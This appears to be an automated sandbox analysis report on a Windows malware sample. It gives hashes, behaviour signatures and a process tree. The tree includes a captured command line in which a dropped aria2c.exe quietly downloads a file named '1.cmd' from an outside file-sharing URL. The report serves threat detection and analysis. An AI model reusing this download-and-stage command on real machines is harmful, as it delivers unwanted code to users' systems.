e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
03/02/2024, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
Size

1.9MB
MD5

61e62e70e51eeba5c6041960dcbb47a5
SHA1

94213db89c31c5314378b2ec6e1859cd83610530
SHA256

e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f
SHA512

e0c1270ef1252a8d029c383b5de46eef09369ace186eb7f6a43fb925d5dbc492faa9ee116b3f18ecc1cc73d345201b80746d9c501765edc8d5b44a9c3c2e1a0f
SSDEEP

49152:peqiGLHnKt1f2LSSlaugdgqeZzD0z2dJDK3Shz4JHbjQHv3RHAygA0:peNGOci2qDCdJWDi+W0

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2628	aria2c.exe

Loads dropped DLL 3 IoCs

pid	Process
2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
2680	Process not Found

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2460 wrote to memory of 2628	2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	28
PID 2460 wrote to memory of 2628	2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	28
PID 2460 wrote to memory of 2628	2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	28
PID 2460 wrote to memory of 2628	2460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	28

C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
"C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Users\Administrator\lgx\aria2c.exe
  "C:\Users\Administrator\lgx\aria2c.exe" --quiet --allow-overwrite=true -d "C:\Users\Administrator\lgx" -o 1.cmd "https://vip.123pan.cn/1814328088/gtx/551.23/ykd"
  2⤵
  - Executes dropped EXE
  PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Administrator\lgx\aria2c.exe

Filesize
3.1MB

MD5
20c51badeab67a2e6ccefe85f8d83ab0

SHA1
ea109f1d681c9de61eae24046c1f535a630c8534

SHA256
736d6cdbe08e7bacebf30eb027b0cb87602b949d1edfb002217b82204c4a5161

SHA512
c81dccee0f841519eabbbd7de44bcd232432e13f95dd769e232c9958ace00fbf3a8fb84a55203279786b04acc85c54a2822e3c11d6b1c172bdea497ead6b7d8b

Download Submit
\Users\Administrator\lgx\aria2c.exe

Filesize
462KB

MD5
049519830e17964974989a25ea441a7a

SHA1
95239a050ff5a17d4437754d821f44533edaecf8

SHA256
8ec25570234a3a976138e403acad0c95a6f4ce65501aefdc9839d4fc7a6480e4

SHA512
44a26abb4709ba46882d3acd363929b63d632346c870256c44cc7ba796aa0e97fbeb5711f832cb3213f548b11f6eb3ed388a4a2b737bd32542b00001f159a5d9

Download Submit
\Users\Administrator\lgx\aria2c.exe

Filesize
2.7MB

MD5
abf058896acbba8df409057796bbab92

SHA1
a96b7bcde090edccb419fea73426451098a129e0

SHA256
aab24978671375380140f72ba7a5231e58bb2932dac4c4c9bf0819e55fb59667

SHA512
1fe9d903cd854a64961d7345236e611725cd1b3c9ea0506ec67f84313d34729532d8c1283c41b9c3c717e6ae4fd550cab627051459507416799019d6c0752f10

Download Submit
\Users\Administrator\lgx\aria2c.exe

Filesize
2.5MB

MD5
44080066742147dda6133690bb851c20

SHA1
226ce45578992b371870b0a093ddb08113ab873b

SHA256
a4ea1156c2dd943e3f193698de069f45a0aa6e84756284a9ab35d682f05e2612

SHA512
5b0811347afe4d111a0163b92bdbb2519b79b7e0aec71f20a00fb26adfa1cefc06c6024994d1d9242fdaf68586384d9f29005e020f50c778dd328dcc305fc873

Download Submit
memory/2628-8-0x000000013F790000-0x000000013FCFD000-memory.dmp

Filesize
5.4MB

Download
memory/2628-18-0x000000013F790000-0x000000013FCFD000-memory.dmp

Filesize
5.4MB

Download